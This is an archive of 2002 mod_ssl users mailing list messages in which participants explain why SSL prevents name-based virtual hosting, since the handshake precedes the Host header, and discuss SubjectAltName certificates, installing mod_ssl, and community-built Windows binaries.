> "It takes a child to raze a village."
> -Michael T. Fry
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 17:01:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA09292; Sat, 28 Sep 2002 17:00:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from d101.x-mailer.de id QAA09172; Sat, 28 Sep 2002 16:59:31 +0200 (MET DST)
Received: from [217.84.31.234] (helo=workstation.gietl.com)
	by d101.x-mailer.de with asmtp (TLSv1:RC4-MD5:128)
	(Exim 3.33 #3)
	id 17vJ41-000074-00; Sat, 28 Sep 2002 16:59:25 +0200
Content-Type: text/plain;
  charset="iso-8859-1"
From: Andreas Gietl 
Organization: e-admin internet gmbh
To: modssl-users@modssl.org, "Chris Allen" 
Subject: Re: Is anyone doing this!?!
Date: Sat, 28 Sep 2002 16:59:23 +0200
User-Agent: KMail/1.4.3
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela> <14854.1033182774@elisabeth.cfrq.net> <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com>
In-Reply-To: <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200209281659.24208.a.gietl@e-admin.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Gietl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Saturday 28 September 2002 16:50, Chris Allen wrote:

i think the problem is that in http1.0 the hostname is not sent along with the 
Http-header. So you just know the IP.

> Hey all,
>
> I am missing something in my understanding. Many people have asked this
> question countless times.
> Is this something that mod_ssl needs or is this a apache(etc) related
> problem? Is there ever going to be a way to do name based virtual hosting
> with apache and mod_ssl?
>
>
> "because the Hostname is not known by the server at the time it should
> present the certificate."
>
> Surely this isnt as trivial as it sounds? How about we let the server know
> the hostname?
>
>
> Thanks for any info.
> ------------------------------------------------
> -ccma Supreme Being of Leisure
>
>
> ----- Original Message -----
> From: "Harald Koch" 
> To: 
> Sent: Friday, September 27, 2002 10:12 PM
> Subject: Re: Is anyone doing this!?!
>
> > Of all the gin joints in all the towns in all the world, Tim Tassonis
> >
> > had to walk into mine and say:
> > > If you are talking about Name Based Virtual Hosts (same ip:port, but
> > > different names) you are out of luck. You can't present different
> > > certificates with Name Based Virtual Hosts, because the Hostname is not
> > > known by the server at the time it should present the certificate.
> >
> > SubjectAltName?
> >
> > --
> > Harald Koch     
> >
> > "It takes a child to raze a village."
> > -Michael T. Fry
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
e-admin internet gmbh
Andreas Gietl                                          tel +49 941 3810884
Ludwig-Thoma-Strasse 35                      fax +49 941 3810891
93051 Regensburg                                  mobil +49 171 6070008

PGP/GPG-Key unter http://www.e-admin.de/gpg.html




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 17:11:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA09870; Sat, 28 Sep 2002 17:10:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from stargate.oinc.net id RAA09862; Sat, 28 Sep 2002 17:10:02 +0200 (MET DST)
Received: from oinc.net (dsl-64-192-81-101.telocity.com [64.192.81.101])
	by stargate.oinc.net (8.12.1/8.12.1) with ESMTP id g8SF9m18021930
	for ; Sat, 28 Sep 2002 11:09:49 -0400
Message-ID: <3D95C632.9000005@oinc.net>
Date: Sat, 28 Sep 2002 11:09:38 -0400
From: "Brian O'Neill" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Is anyone doing this!?!
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela>             <14854.1033182774@elisabeth.cfrq.net> <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian O'Neill" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Because an SSL connection is established before the HTTP protocol sends 
any information, there is no way for it to get the hostname as that is 
transmitted as part of the HTTP protocol. The only known information is 
the IP address.

-Brian

Chris Allen wrote:
> Hey all,
> 
> I am missing something in my understanding. Many people have asked this
> question countless times.
> Is this something that mod_ssl needs or is this a apache(etc) related
> problem? Is there ever going to be a way to do name based virtual hosting
> with apache and mod_ssl?
> 
> 
> "because the Hostname is not known by the server at the time it should
> present the certificate."
> 
> Surely this isnt as trivial as it sounds? How about we let the server know
> the hostname?
> 
> 
> Thanks for any info.
> ------------------------------------------------
> -ccma Supreme Being of Leisure
> 
> 
> ----- Original Message -----
> From: "Harald Koch" 
> To: 
> Sent: Friday, September 27, 2002 10:12 PM
> Subject: Re: Is anyone doing this!?!
> 
> 
> 
>>Of all the gin joints in all the towns in all the world, Tim Tassonis
>>had to walk into mine and say:
>>
>>>If you are talking about Name Based Virtual Hosts (same ip:port, but
>>>different names) you are out of luck. You can't present different
>>>certificates with Name Based Virtual Hosts, because the Hostname is not
>>>known by the server at the time it should present the certificate.
>>
>>SubjectAltName?
>>
>>--
>>Harald Koch     
>>
>>"It takes a child to raze a village."
>>-Michael T. Fry
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 17:13:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA09942; Sat, 28 Sep 2002 17:12:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from romeo.rtfm.com id RAA09890; Sat, 28 Sep 2002 17:11:19 +0200 (MET DST)
Received: from romeo.rtfm.com (localhost.rtfm.com [127.0.0.1])
	by romeo.rtfm.com (8.12.4/8.12.4) with ESMTP id g8SFDYRD003794;
	Sat, 28 Sep 2002 08:13:34 -0700 (PDT)
	(envelope-from ekr@romeo.rtfm.com)
Received: (from ekr@localhost)
	by romeo.rtfm.com (8.12.4/8.12.4/Submit) id g8SFDXeP003791;
	Sat, 28 Sep 2002 08:13:33 -0700 (PDT)
To: modssl-users@modssl.org
Cc: "Chris Allen" 
Subject: Re: Is anyone doing this!?!
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela> <14854.1033182774@elisabeth.cfrq.net> <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com> <200209281659.24208.a.gietl@e-admin.de>
Mime-Version: 1.0 (generated by tm-edit 1.8)
Content-Type: text/plain; charset=US-ASCII
From: Eric Rescorla 
Date: 28 Sep 2002 08:13:33 -0700
In-Reply-To: Andreas Gietl's message of "Sat, 28 Sep 2002 16:59:23 +0200"
Message-ID: 
Lines: 15
X-Mailer: Gnus v5.6.45/XEmacs 21.1 - "Cuyahoga Valley"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> i think the problem is that in http1.0 the hostname is not sent along with the 
> Http-header. So you just know the IP.

Not quite.

The problem is that the SSL handshake happens before any HTTP
traffic is sent. Thus, the server doesn't know.

Fixing this requires a change to SSL/TLS. This change is in
process (see draft-ietf-tls-extensions-XX.txt). However,
you will still have to wait for it to percolate through
most of the browsers in the world, which will take quite some
time.

-Ekr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 17:14:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA09979; Sat, 28 Sep 2002 17:13:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.dev.datalogica.com id RAA09973; Sat, 28 Sep 2002 17:12:15 +0200 (MET DST)
Received: from localhost (localhost [[UNIX: localhost]])
	by iris.dev.datalogica.com (8.11.6/8.11.6) id g8SFCAW14206;
	Sat, 28 Sep 2002 15:12:10 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org, "Chris Allen" 
Subject: Re: Is anyone doing this!?!
Date: Sat, 28 Sep 2002 17:12:06 +0200
User-Agent: KMail/1.4.1
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela> <14854.1033182774@elisabeth.cfrq.net> <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com>
In-Reply-To: <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com>
MIME-Version: 1.0
Message-Id: <200209281712.09087.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA09976
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

i think that the only infos in clear text are the ip and port, eg. the tcp 
header
https is encapsulated
other http data are ssl crypted
url is http, not tcp
so, apache can differentiate by ip:port and not by name .
- -- 
Maurizio Marini
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9lcbG4Q/49nIJTlwRAkWYAJ41gzJ2LUorgfRUzfaXilRY9JEgMgCdGLUG
Sv8uuMkecOD9ITYcR5+0hqo=
=NqHx
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 17:17:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA10223; Sat, 28 Sep 2002 17:16:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sccrmhc03.attbi.com id RAA10208; Sat, 28 Sep 2002 17:15:28 +0200 (MET DST)
Received: from Allen ([24.245.48.155]) by sccrmhc03.attbi.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020928151522.SZDN22381.sccrmhc03.attbi.com@Allen>;
          Sat, 28 Sep 2002 15:15:22 +0000
Message-ID: <002e01c26701$f3ae2660$9b30f518@ce1.client2.attbi.com>
From: "Chris Allen" 
To: "EKR" , 
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela> <14854.1033182774@elisabeth.cfrq.net> <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com> <200209281659.24208.a.gietl@e-admin.de> 
Subject: Re: Is anyone doing this!?!
Date: Sat, 28 Sep 2002 10:15:59 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Allen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks! Great, can't hardly wait.

> 
> Fixing this requires a change to SSL/TLS. This change is in
> process (see draft-ietf-tls-extensions-XX.txt). However,
> you will still have to wait for it to percolate through
> most of the browsers in the world, which will take quite some
> time.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 17:19:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA10318; Sat, 28 Sep 2002 17:18:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from persephone.cfrq.net id RAA10278; Sat, 28 Sep 2002 17:17:36 +0200 (MET DST)
Received: from elisabeth.cfrq.net (elisabeth.chk.cfrq.net [199.85.99.82] (may be forged))
	by persephone.cfrq.net (8.12.2/8.12.2) with ESMTP id g8SFHMmR002986
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Sat, 28 Sep 2002 11:17:24 -0400
Received: from elisabeth.cfrq.net (localhost [127.0.0.1])
	by elisabeth.cfrq.net (8.12.2/8.12.2) with ESMTP id g8SFHIB6003050
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Sat, 28 Sep 2002 11:17:20 -0400
Received: from elisabeth.cfrq.net (chk@localhost)
	by elisabeth.cfrq.net (8.12.2/8.12.2/Submit) with ESMTP id g8SFHEcd003046
	for ; Sat, 28 Sep 2002 11:17:17 -0400
X-Authentication-Warning: elisabeth.cfrq.net: chk owned process doing -bs
To: modssl-users@modssl.org
Subject: Re: Is anyone doing this!?! 
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela>  <14854.1033182774@elisabeth.cfrq.net>
            <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com>
In-reply-to: Your message of "Sat, 28 Sep 2002 09:50:58 -0500".
	 <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com> 
From: Harald Koch 
Date: Sat, 28 Sep 2002 11:17:12 -0400
Message-ID: <3045.1033226232@elisabeth.cfrq.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harald Koch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Of all the gin joints in all the towns in all the world, "Chris Allen"
had to walk into mine and say:
> 
> Is this something that mod_ssl needs or is this a apache(etc) related
> problem? Is there ever going to be a way to do name based virtual hosting
> with apache and mod_ssl?

It's an HTTP over SSL problem.

The normal HTTP transaction looks something like:
- connect to server
- issue GET request, with Host: header
- web server serves virtual host information based on Host: header

The normal HTTPS transaction looks something like:
- connect (TCP) to server
- perform SSL handshake; server sends server SSL certificate
- perform server certificate verification
- issue get request, with Host: header

Notice the order of operations is backwards; the server issues the SSL
certificate *before* the server receives the Host: header, so it can't
send out *different* SSL certificates.

There are several solutions to this problem:

1) use IP address based virtual hosting. In this case, the SSL server
   knows the IP address before sending the SSL request. This is the most
   common solution, because it is easy and can be extended to new
   virtual hosts easily. The downside is that you need a separate
   address per virtual host.

2) use SSL over HTTP (not very well supported at this time).

3) Configure the SSL server to use a single SSL certificate. Put *all*
   of the names and addresses of the server into the "subjectAltName"
   extension field of the certificate.

   Note that this only works well if your set of virtual hosts is small
   and unchanging (like mine), or if you have your own CA. This is
   because you need to reissue the certificate every time you add (or
   remove :-) a virtual host.

-- 
Harald Koch     

"It takes a child to raze a village."
		-Michael T. Fry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 17:20:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA10357; Sat, 28 Sep 2002 17:19:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from wlv.to.gd-es.com id RAA10316; Sat, 28 Sep 2002 17:18:03 +0200 (MET DST)
Received: from HDIS-C3620-A41.TO.GD-ES.COM (mcc@HDIS-C3620-A41.TO.GD-ES.COM [199.107.247.41])
	by wlv.to.gd-es.com (8.11.6/8.10.1) with ESMTP id g8SFDra18259
	for ; Sat, 28 Sep 2002 08:13:53 -0700 (PDT)
Date: Sat, 28 Sep 2002 08:13:51 -0700 (PDT)
From: Merton Campbell Crockett 
X-Sender: mcc@SPIELZEUG.HASENTALER.THOUSAND-OAKS.CA.US
To: modssl-users@modssl.org
Subject: Re: Is anyone doing this!?! 
In-Reply-To: <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Merton Campbell Crockett 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 28 Sep 2002, Chris Allen wrote:

> Hey all,
> 
> I am missing something in my understanding. Many people have asked this
> question countless times.
> Is this something that mod_ssl needs or is this a apache(etc) related
> problem? Is there ever going to be a way to do name based virtual hosting
> with apache and mod_ssl?

It is the nature of the SSL/TLS protocol.  The entire payload is encrypted.  
The only key available for determining which key to use for decrypting the
payload is the target IP address.

To expose some portions of the HTTP header, i.e. the Host: entity, would
require a change to the SSL/TLS protocol.  In turn, this would require
changes to mod_ssl, Apache, and all other web server software.  In addition,
it would require changes to every web gateway, proxy, and browser in extent.

> "because the Hostname is not known by the server at the time it should
> present the certificate."
> 
> Surely this isnt as trivial as it sounds? How about we let the server know
> the hostname?

It's not trivial.

Merton Campbell Crockett

> 
> ----- Original Message -----
> From: "Harald Koch" 
> To: 
> Sent: Friday, September 27, 2002 10:12 PM
> Subject: Re: Is anyone doing this!?!
> 
> 
> >
> > Of all the gin joints in all the towns in all the world, Tim Tassonis
> > had to walk into mine and say:
> > >
> > > If you are talking about Name Based Virtual Hosts (same ip:port, but
> > > different names) you are out of luck. You can't present different
> > > certificates with Name Based Virtual Hosts, because the Hostname is not
> > > known by the server at the time it should present the certificate.
> >
> > SubjectAltName?
> >
> > --
> > Harald Koch     
> >
> > "It takes a child to raze a village."
> > -Michael T. Fry
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
BEGIN:				vcard
VERSION:			3.0
FN:				Merton Campbell Crockett
ORG:				General Dynamics Advanced Information Systems;
				Intelligence Solutions
N:				Crockett;Merton;Campbell
EMAIL;TYPE=internet:		mcc@CATO.GD-AIS.COM
TEL;TYPE=work,voice,msg,pref:	+1(805)497-5045
TEL;TYPE=pager,msg:		+1(877)528-0049
TEL;TYPE=fax,work:		+1(805)497-5050
TEL;TYPE=cell,voice,msg:	+1(805)377-6762
END:				vcard

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 17:36:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA10706; Sat, 28 Sep 2002 17:35:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from moutvdom.kundenserver.de id RAA10699; Sat, 28 Sep 2002 17:34:34 +0200 (MET DST)
Received: from [195.20.224.204] (helo=mrvdomng.kundenserver.de)
	by moutvdom.kundenserver.de with esmtp (Exim 3.35 #1)
	id 17vJc2-0004SQ-00
	for modssl-users@modssl.org; Sat, 28 Sep 2002 17:34:34 +0200
Received: from [217.226.107.39] (helo=nimmerleer)
	by mrvdomng.kundenserver.de with smtp (Exim 3.35 #1)
	id 17vJc2-0004xb-00
	for modssl-users@modssl.org; Sat, 28 Sep 2002 17:34:34 +0200
Message-ID: <001a01c26704$21d7b4f0$c9a6fea9@nimmerleer>
From: "Andreas Schnell" 
To: 
Subject: mod_ssl and apache 1.3.26
Date: Sat, 28 Sep 2002 17:31:35 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0017_01C26714.E50C7180"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andreas Schnell" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0017_01C26714.E50C7180
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hey,

I try to install mod_ssl.

The problem is that the install manual just describes how to install it =
together with apache and openssl.

Well... I have Apache 1.3.26 and openssl 0.9.6c already installed and =
don't want to remove it just to install mod_ssl.

Is there any way to install mod_ssl, even if apache and openssl is =
already installed ?
I hope so.

Any help is greatly appreciated.

Thnx

Andreas

------=_NextPart_000_0017_01C26714.E50C7180
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hey,


 


I try to install mod_ssl.


 


The problem is that the install manual =
just=20
describes how to install it together with apache and =
openssl.


 


Well... I have Apache 1.3.26 and =
openssl 0.9.6c=20
already installed and don't want to remove it just to install=20
mod_ssl.


 


Is there any way to install mod_ssl, =
even if apache=20
and openssl is already installed ?


I hope so.


 


Any help is greatly =
appreciated.


 


Thnx


 


Andreas


------=_NextPart_000_0017_01C26714.E50C7180--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 20:06:00 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA13137; Sat, 28 Sep 2002 20:04:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from krusty.unitec.edu.ve id UAA13111; Sat, 28 Sep 2002 20:04:00 +0200 (MET DST)
Received: by KRUSTY with Internet Mail Service (5.5.2448.0)
	id ; Sat, 28 Sep 2002 14:15:35 -0400
Message-ID: <6187787D77C6D111BC4B006008A2E26917795A@KRUSTY>
From: Medina Malpica Victor 
To: "'modssl-users@modssl.org'" 
Subject: RE: Windows binaries for Apache
Date: Sat, 28 Sep 2002 14:15:35 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2671B.0A32857A"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Medina Malpica Victor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2671B.0A32857A
Content-Type: text/plain;
	charset="windows-1252"

 Hi guys!
I did mor or less the same, but I added and installer, my copy comes with
the apache 2.0.40, openssl0.9.6g, php 4.2.3 and mysql 4

The installer can preconfigure everything

Now you guys two distintc setups one with apache 1.3 (provided by hunter)and
the other one (apache 2 based) provided by me

Hope this works guys!!

Good Luck!!
URL:
Server Installer
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/IKIRUX_WSP_Pro1Beta3_EN
G.exe

Installation Guide:
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server
Installation Guide.pdf

Release Notes:

ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server Release
Notes.pdf

-----Original Message-----
From: hunter
To: modssl-users@modssl.org
Sent: 27/09/02 22:25
Subject: Windows binaries for Apache

Apache users...

In response to requests for Windows binaries, I built Apache 1.3.26 with

mod_ssl 2.8.10 and OpenSSL 0.9.6g.  However, I was unable to upload the 
files to the mod_ssl contrib site and offered to temporarily host the 
files on my server.  I am limited in how long I can do this since my ISP

will charge me dollars/GB after 10GB of downloads per month.  I will not

be removing the binaries from my server unless I am in danger of 
exceeding the limit.

Ken Campney generously offered to host these files, so that they can 
continue to be available.  The new links are listed below.

http://hunter.campbus.com/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Wi
n32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip

Please use the links above instead of my server...
http://tor.ath.cx/~hunter/apache

I will continue to provide you with new binaries if the sources change 
and there is continued interest in Apache 1.3.xx

Please download from the hunter.campbus.com location if possible.

If you have any problems contact me on the list, as 
 or at my personal account: hunter@tor.ath.cx

Chris.


Legal Notice
------------

These packagages use strong cryptography that is regulated by 
export/import/use restrictions in some other parts of the world and are 
provided free of charge.

PLEASE REMEMBER THAT EXPORT/IMPORT AND/OR USE OF STRONG CRYPTOGRAPHY 
SOFTWARE, PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING 
TECHNICAL DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS 
OF THE WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, 
RE-DISTRIBUTE IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR 
EVEN SOURCE PATCHES TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY 
ADVISED TO PAY CLOSE ATTENTION TO ANY EXPORT/IMPORT AND/OR USE LAWS 
WHICH APPLY TO YOU. WE NOR THE AUTHORS OF THE REPRESENTED SOFTWARE 
PACKAGES ARE OR WILL BE HELD LIABLE FOR ANY VIOLATIONS YOU MAKE. BE 
CAREFUL, IT IS YOUR RESPONSIBILITY.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C2671B.0A32857A
Content-Type: text/html;
	charset="windows-1252"
Content-Transfer-Encoding: quoted-printable






RE: Windows binaries for Apache




 Hi guys!

I did mor or less the same, but I added and =
installer, my copy comes with the apache 2.0.40, openssl0.9.6g, php =
4.2.3 and mysql 4



The installer can preconfigure everything




Now you guys two distintc setups one with apache 1.3 =
(provided by hunter)and the other one (apache 2 based) provided by =
me



Hope this works guys!!




Good Luck!!

URL:

Server Installer

ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/I=
KIRUX_WSP_Pro1Beta3_ENG.exe




Installation Guide:

ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/I=
kirux Server Installation Guide.pdf




Release Notes:




ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/I=
kirux Server Release Notes.pdf




-----Original Message-----

From: hunter

To: modssl-users@modssl.org

Sent: 27/09/02 22:25

Subject: Windows binaries for Apache




Apache users...




In response to requests for Windows binaries, I built =
Apache 1.3.26 with




mod_ssl 2.8.10 and OpenSSL 0.9.6g.  However, I =
was unable to upload the 

files to the mod_ssl contrib site and offered to =
temporarily host the 

files on my server.  I am limited in how long I =
can do this since my ISP




will charge me dollars/GB after 10GB of downloads per =
month.  I will not




be removing the binaries from my server unless I am =
in danger of 

exceeding the limit.




Ken Campney generously offered to host these files, =
so that they can 

continue to be available.  The new links are =
listed below.




http://hunter.campbus.com/Apache_1.3.26-Mod_SSL_2.8.10=
-OpenSSL_0.9.6g-Wi

n32.zip

http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip=





http://hunter.campbus.com/Apache_2.0.42-OpenSSL_0.9.6g=
-Win32.zip




Please use the links above instead of my =
server...

http://tor.ath.cx/~hunter/apache




I will continue to provide you with new binaries if =
the sources change 

and there is continued interest in Apache =
1.3.xx




Please download from the hunter.campbus.com location =
if possible.




If you have any problems contact me on the list, as =


<theantigod@sympatico.ca> or at my personal =
account: hunter@tor.ath.cx




Chris.






Legal Notice

------------




These packagages use strong cryptography that is =
regulated by 

export/import/use restrictions in some other parts =
of the world and are 

provided free of charge.




PLEASE REMEMBER THAT EXPORT/IMPORT AND/OR USE OF =
STRONG CRYPTOGRAPHY 

SOFTWARE, PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST =
COMMUNICATING 

TECHNICAL DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS =
ILLEGAL IN SOME PARTS 

OF THE WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO =
YOUR COUNTRY, 

RE-DISTRIBUTE IT FROM THERE OR EVEN JUST EMAIL =
